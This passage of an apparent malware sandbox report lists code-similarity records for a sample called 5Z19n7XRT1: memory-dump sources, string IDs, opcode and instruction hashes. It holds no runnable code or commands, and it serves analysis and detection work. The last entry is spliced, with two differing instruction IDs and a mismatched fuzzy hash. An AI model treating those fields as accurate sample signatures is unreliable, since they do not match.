• Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: f
• API String ID: 2994545307-1993550816
• Opcode ID: 5a2b71fe6b7abe8913033312b3adb200dd37ce9910002ae41400eab354b8cdfc
• Instruction ID: c6061003a35e321c419c30bd02a3c4e1c0b56f4f8cbc670ef9e4360bbe252bef
• Opcode Fuzzy Hash: 5a2b71fe6b7abe8913033312b3adb200dd37ce9910002ae41400eab354b8cdfc
• Instruction Fuzzy Hash: 7722EF756083518FD718CF25C880A2BBBE2BBC9314F199A2DE4D587391DBB4EC06CB46
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: f
• API String ID: 0-1993550816
• Opcode ID: 63a83f5a27331d9fe3a04257bda5fcaf30bc217a6dc898aca3077588f1bd9e28
• Instruction ID: 4219466cffb1b245e999101c07fd13b92c2e63b957af67180792dbcb473d4680
• Opcode Fuzzy Hash: 63a83f5a27331d9fe3a04257bda5fcaf30bc217a6dc898aca3077588f1bd9e28
• Instruction Fuzzy Hash: 9822F2796083519FD754CF29C880B2BBBE2BBC9718F288A2DE5D597391DB70D805CB42
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: A67H
• API String ID: 0-3389657328
• Opcode ID: 025ab6247b28a9282489cbf8863c1f11cc422bce5e661f3cde5867652b65232c
• Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
• Opcode Fuzzy Hash: 025ab6247b28a9282489cbf8863c1f11cc422bce5e661f3cde5867652b65232c
• Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: [
• API String ID: 0-3878419350
• Opcode ID: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
• Instruction ID: 3ba1abbb005ae7d47fef9b25955e9e631f09e9f174ff1680e564550c5f84974b
• Opcode Fuzzy Hash: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
• Instruction Fuzzy Hash: CD020075600702CBCB24CF29C8E1663B7F2FFA9714B19859DC4864FBA5EB39A452CB50
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: ,)*k
• API String ID: 2994545307-1228391949
• Opcode ID: 3abeb72b50cbf0ea3c5cb2ec33269c319db1e6da438ada41a467feb5054111f7
• Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
• Opcode Fuzzy Hash: 3abeb72b50cbf0ea3c5cb2ec33269c319db1e6da438ada41a467feb5054111f7
• Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: ,)*k
• API String ID: 0-1228391949
• Opcode ID: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
• Instruction ID: 9832939cc0ca6e4005c5657630c66589d1309634df904c298b50862bafd67e39
• Opcode Fuzzy Hash: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
• Instruction Fuzzy Hash: 04C1687DA083105BD364DF29C880A3FFBEAABC6714F29992EE58157780D7319C40CB82
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: m
• API String ID: 0-3775001192
• Opcode ID: 6ef6d805ebeae707db88c870f1bf3431cf214446e2165707fa793f0aed11e90b
• Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
• Opcode Fuzzy Hash: 6ef6d805ebeae707db88c870f1bf3431cf214446e2165707fa793f0aed11e90b
• Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: 167H
• API String ID: 2994545307-2704650348
                                                                                                                                                                                                                                                                          • Opcode ID: 47f0214db84f49b5bfad94cac133fa0217f1a5aa21233c84e6ce32df6523bf1a
                                                                                                                                                                                                                                                                          • Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47f0214db84f49b5bfad94cac133fa0217f1a5aa21233c84e6ce32df6523bf1a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 167H
                                                                                                                                                                                                                                                                          • API String ID: 0-2704650348
                                                                                                                                                                                                                                                                          • Opcode ID: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                                          • Instruction ID: 68ed794287213f62c57d89f4b2042641088a8b9800cd6093fe2dc976d33dd27b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FD18772A043444BDB15CF298C816EBF792EFC5314F59862EE985873C0D775C906CBA2
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: .
                                                                                                                                                                                                                                                                          • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                          • Opcode ID: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                                                          • Instruction ID: 81f36312a2ed6ba89055a7637830084efded24017588a7aed2dcd3164ab5f086
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72C105B5D01212CBCB24CF29C8917BBB7B1FF95314F19825ED896AB790E734A941CB90
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: .
                                                                                                                                                                                                                                                                          • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                          • Opcode ID: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                                          • Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                                                                          • API String ID: 0-2852464175
                                                                                                                                                                                                                                                                          • Opcode ID: f90cc14d5b1d07471296a569d27c41b333f7458cf0fcf530a90d726fe5722012
                                                                                                                                                                                                                                                                          • Instruction ID: 0c29c4f326a3360d4f83cd19facfb249d1e6e8dcfa8d7f8eb9091c930c4cf0c7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f90cc14d5b1d07471296a569d27c41b333f7458cf0fcf530a90d726fe5722012
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69D17634B05254CFDB14CF78E8D16AEBBB2AF1A310F6841BDE5519B392CB384906CB59
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &#
                                                                                                                                                                                                                                                                          • API String ID: 0-1789715784
                                                                                                                                                                                                                                                                          • Opcode ID: de53aefd5a1aa7a3c6e7ceeff6aeff0c51e7fefa1ef74132f5b7c443d7941a72
                                                                                                                                                                                                                                                                          • Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de53aefd5a1aa7a3c6e7ceeff6aeff0c51e7fefa1ef74132f5b7c443d7941a72
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &#
                                                                                                                                                                                                                                                                          • API String ID: 0-1789715784
                                                                                                                                                                                                                                                                          • Opcode ID: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                                                          • Instruction ID: 96b86d7540c5f77ace728f7c69143a4dcb02229961cbb447936c71c566bc1532
• Opcode Fuzzy Hash: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
• Instruction Fuzzy Hash: 81A14C71A042105BDB1ADF28CC526BB73E5EF91324F09852EED96DB390E3B4D905C762
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: .
• API String ID: 0-1505114982
• Opcode ID: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
• Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
• Opcode Fuzzy Hash: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
• Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: -
• API String ID: 0-2547889144
• Opcode ID: 27c89adea84a4971459812ff31a4728146f694fcb44008b8af47e8cd9ff8a59b
• Instruction ID: 9ab1ffac1155baa116eee1a4e09dc656cf79e2e31ea32e76bff985f9d1b7f6db
• Opcode Fuzzy Hash: 27c89adea84a4971459812ff31a4728146f694fcb44008b8af47e8cd9ff8a59b
• Instruction Fuzzy Hash: 3CD1FC31A087454BCB18CE2DC89026FBFD3AFC2624F188A5EE4E6473D5D7399945CB81
Strings
• F1177B6615FB90FCF9F1B7136A1E0C5E, xrefs: 004097D3
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: F1177B6615FB90FCF9F1B7136A1E0C5E
• API String ID: 0-2392879585
• Opcode ID: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
• Instruction ID: 2e87a28a76dba4f31cae47dba0fb7e22e1a8f98f0dc0d4366023ba0889080103
• Opcode Fuzzy Hash: ff3731471c5a2191c5a05658faba6c42204445524e7f8331b46cc9c8e8b982bc
• Instruction Fuzzy Hash: 35C105716083808BD318DF35C85066BBBE6EBD2314F14893DE4D697392DB39C90ACB56
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: de
• API String ID: 0-2106599819
• Opcode ID: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
• Instruction ID: 237539fc1c8f80e61523eba48e1ed7785010906efede98e614aae4835ec7f1bb
• Opcode Fuzzy Hash: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
• Instruction Fuzzy Hash: 53912271908311CAC324DF68C8E266BB7F2EFA1324F18992EE4D64B391E7788505C792
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: ~
• API String ID: 0-1707062198
• Opcode ID: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
• Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
• Opcode Fuzzy Hash: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
• Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: ~
• API String ID: 0-1707062198
• Opcode ID: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
• Instruction ID: 5bc335a9b2116e7bd9f3a38b2fdb064bd79dfa175364076baab1d7d3bead90e0
• Opcode Fuzzy Hash: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
• Instruction Fuzzy Hash: 5FA12976E042619FC725CE2CCC906ABB7E1AF95324F19823EECA9973D1D7318806C791
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: RpB
• API String ID: 0-664042118
• Opcode ID: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
• Instruction ID: f37ba1eb55105a71e6c02689e7a75f224f26334d47d5f70d86fb510902375083
• Opcode Fuzzy Hash: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
• Instruction Fuzzy Hash: 09B12532A0C391CFD314CF28E89072AB7E2BF8A711F1A4A6DE59597391C7349D45CB4A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
Yara matches
Similarity
• API ID:
• String ID: d1
                                                                                                                                                                                                                                                                          • API String ID: 0-4211392460
                                                                                                                                                                                                                                                                          • Opcode ID: 3a09c18315f27601645beb0ad486dee07da92b92439b4458714023d4f5bac47a
                                                                                                                                                                                                                                                                          • Instruction ID: 74c04020a71521c8b9984734295d0b81cdc6df3862d17ec890c7cf8b211da757
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a09c18315f27601645beb0ad486dee07da92b92439b4458714023d4f5bac47a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 409112B5618200DFD714DF24E881A7BB7A0FB8A705F84593EF48693361DB38C9158B4A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: cdef
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-4216504194
                                                                                                                                                                                                                                                                          • Opcode ID: 6bc07d34d1d6b00cc4b19fb39e7543bc3ba7a18e64985db278588bca8b02e99b
                                                                                                                                                                                                                                                                          • Instruction ID: d704160fc5b89d86d9794d8a66ae716d782a0973953182dc9c1641cf0cee7e05
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bc07d34d1d6b00cc4b19fb39e7543bc3ba7a18e64985db278588bca8b02e99b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30815471A083108FC718DF24E88096BBBA2EFDA310F19993DE9D557352C735AC05C786
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: cdef
                                                                                                                                                                                                                                                                          • API String ID: 0-4216504194
                                                                                                                                                                                                                                                                          • Opcode ID: 6cfb0631b4c3af94e0a4d7ca533938db559d7b6d0bfe02f92feebc81ba876585
                                                                                                                                                                                                                                                                          • Instruction ID: 1b2747d12fbd72633825edd75b6ffa621c34162411ae735f4f7cc1ee0948dd35
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6cfb0631b4c3af94e0a4d7ca533938db559d7b6d0bfe02f92feebc81ba876585
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83816839E083508FC764DF18C890A7BB7A1EFD6714F28893DD99557395D731A802C782
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: gfff
                                                                                                                                                                                                                                                                          • API String ID: 0-1553575800
                                                                                                                                                                                                                                                                          • Opcode ID: c5d9ff75fed77c201b8d14b3cc3b758706ca82fef0a51ed8aa8899dc59fb4eb5
                                                                                                                                                                                                                                                                          • Instruction ID: 7bba0880d928a25eaad3b9bb39324819c2d9da175eeb1b20af991ab9db3c7655
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5d9ff75fed77c201b8d14b3cc3b758706ca82fef0a51ed8aa8899dc59fb4eb5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6891F3716107428FD724CF39C850BAAB7D2EB96314F18C57EC196CB7A6DB78A442C740
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: c$
                                                                                                                                                                                                                                                                          • API String ID: 0-2516980088
                                                                                                                                                                                                                                                                          • Opcode ID: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                                          • Instruction ID: 34d734b052877dbdf523287f9c605fbc5785e0f76673639941e077e5292fae27
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E49199B0101741CFE7648F25C8A0B63BBB2FF56318F19958DC4864FBA1E379A846CB94
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: Fg
                                                                                                                                                                                                                                                                          • API String ID: 0-875302535
                                                                                                                                                                                                                                                                          • Opcode ID: cec98c6035f8278796335b79b8fe425f66d685e3fc2c40d87c06063720ff0d23
                                                                                                                                                                                                                                                                          • Instruction ID: 81bd39487229f81fa75b1a19b8121f8c05985a2d1a0f7b16a24bef680633e699
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cec98c6035f8278796335b79b8fe425f66d685e3fc2c40d87c06063720ff0d23
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F81E47121D3808BE768CF25C8657ABBBD2EBD2304F58896DC1C987392DB38440ACB56
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: Fg
                                                                                                                                                                                                                                                                          • API String ID: 0-875302535
                                                                                                                                                                                                                                                                          • Opcode ID: 42a71ed4ddc16415858e4dfc4422956aad04ddc95995e0a2601de5add053e1e2
                                                                                                                                                                                                                                                                          • Instruction ID: 9c7a63674a44cca28130444adee5b853dcc1578d22365309ea90ef27fe7bfab9
                                                                                                                                                                                                                                                                          • Instruction ID: d2810210684c591eb7031903a7fe504f0981c3e88daa508caa2b90471dfbc36d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de86720abe9662384bfc4389f4b275199587a53d7c35c6b33b3c21993df62823
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2871D3717047414FD325CF39C8607AABBD2AB95314F18C57EC496CB7A6EA79E442CB40
